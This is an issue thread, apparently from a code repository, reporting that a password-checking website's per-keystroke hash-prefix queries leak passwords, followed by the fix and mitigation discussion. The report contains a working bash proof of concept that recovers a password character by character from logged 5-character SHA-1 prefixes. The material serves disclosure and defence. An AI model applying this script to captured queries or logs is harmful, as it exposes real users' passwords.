security issue - incremental search exposes passwords

Question

security issue - incremental search exposes passwords

Closed this issue 5 years ago · 5 comments

since incremental search on https://passwordsecurity.info/ starts a new query for each new char, each query is easy to get exploited to determine that one new char. Using knowledge from past/history queries together with the recent query, an attacker could reveal any password typed in for check on that website by merely logging the (unencrypted) queries. Even worse this can get done from logged data as well, no need to first "open a backdoor" or anything (again letting aside HTTPS, which - without PFS https://en.wikipedia.org/wiki/Forward_secrecy which luckily seems established on that website - could get compromised any time in future and reveal all passwords from logs for the past months and years). Still leaves the http server access logs.
Completely defeats the purpose of the SHA hashing and 5char truncation in API

Please disable incremental search immediately

realizing it's not immediately clear to everybody, here an example:
md5 s 03c7c0ace395d80182db07ae2c30f034
md5 sk 41d6ad0761a5d27a9e1bd567041ce9e9
md5 skr 154211326b13dba32f059317703da7ed
md5 skri 624354d6b0d01595488285caba297009
md5 skrit eaef5ef87d9b6c8b497acc64af3fdfcb
03c7 41d6 1542 6243 eaef <- completely describes "skrit"

bash:
spy1(){ shashort(){ sha=$(echo -n "${1}"|sha1sum); echo -n ${sha:0:5}; echo "$1 ${sha:0:5}">&2; }; for ((i=20; i<126; i++)); do c="$(printf "\x$(printf %x $i)")"; [ "${2}" == "$(shashort ${1}$c)" ] || continue; printf "found:$c\n">&2; printf "$c"; break; done; }
spy(){ pw="${1}"; shift; [ 1 -gt $# ] && printf "the decoded password is: ${pw}\n\n" && return; sh="${1}"; shift; echo "$# pw:$pw sh:$sh p:$@"; pw+=$(spy1 "${pw}" ${sh}); spy ${pw} "$@"; }
spy "" 86f7e da236 a9993 81fe8 03de6 1f8ac
the decoded password is: abcdef

Answer 1 · 2019-04-17T20:29:11.000Z

Incremental search was disabled in 75285ce

Answer 2 · 2019-04-17T22:17:31.000Z

website https://passwordsecurity.info/ still does incremental search

Answer 3 · 2019-04-17T22:20:54.000Z

"add 2 second delay before testing password "
aaah, ok… Prolly good enough

Answer 4 · 2019-04-17T23:23:25.000Z

2 seconds is the time between two characters being entered. If you type a password at a speed higher than 1 character every 2 seconds it will only issue one request to the api. 2 seconds is a lot. Most people remember their passwords by heart or they copy/paste from their password manager.

Answer 5 · 2019-04-18T04:01:19.000Z

this looks like an already quite sufficient and appropriate measure.
Not doing any automatic search for entries <=4 chars might be an additional optimization.
Yet another possible measure is insertion of a random bogus search (invisible to the user) every now and then, completely spoiling any predictability by poisoning the monitored dataset